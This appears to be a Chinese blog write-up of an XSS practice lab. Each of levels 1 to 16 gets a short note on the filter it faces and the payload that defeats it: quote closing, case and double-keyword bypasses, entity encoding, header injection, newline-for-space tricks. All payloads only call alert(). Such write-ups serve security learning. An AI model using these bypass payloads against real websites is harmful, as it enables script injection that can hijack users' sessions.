xss lab

xss lab

level1

<img src=1 οnerrοr=alert('1')>

level2

闭合

"/><img src=1 onerror=alert(1)>

level3

过滤< >

' onfocus=javascript:alert('xss') class='

level4

" οnfοcus=javascript:alert('xss') class="

level5

过滤事件 onfocus/script 等关键字 添加_干扰

"> <a href=javascript:alert('xss')>xss</a> //

level6

过滤href 大写绕过

"> <a Href=javascript:alert('xss')>xss</a> //

level7

直接删除关键字 双写绕过

"> <a hrhrefef=javascrscriptipt:alert('xss')>xss</a> //

level8

过滤引号 <> 关键字添加_干扰 对javascript unicode编码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#49;&#39;&#41;

level9

检查有无url,加一个即可 unicode编码能绕过替换关键词

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#49;&#39;&#41;//http://

level10

hidden input

t_sort=" οnfοcus=javascript:alert('xss') //

level11

看源码改refer头

"type="text" οnclick=javascript:alert('xss')//

level12

直接改ua头

"type="text" οnclick=javascript:alert('xss')//

level13

应该是改cookie, 题目有点问题

"type="text" οnclick=javascript:alert('xss')//

level14

看wp是文件解析引发xss

在图片的exif信息里加xss

但是链接挂了 x不了

'"><img src=1 onerror=alert(document.domain)>'

level15

AngularJS的javascript框架漏洞

ng-include 可以将部分代码打包成独立文件,在使用ng-include来引用这个独立的HTML文件, 类似文件包含漏洞

环境有点问题

src='level4.php?keyword=%22%20οnmοuseοver=alert(1)%20%22'

level16

过滤空格

<img src=1 onerror=alert(1)>
<img%0asrc=1%0aοnerrοr=alert(1)>

level17/8/9/0

都用的flash,浏览器不支持,懒得做了

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值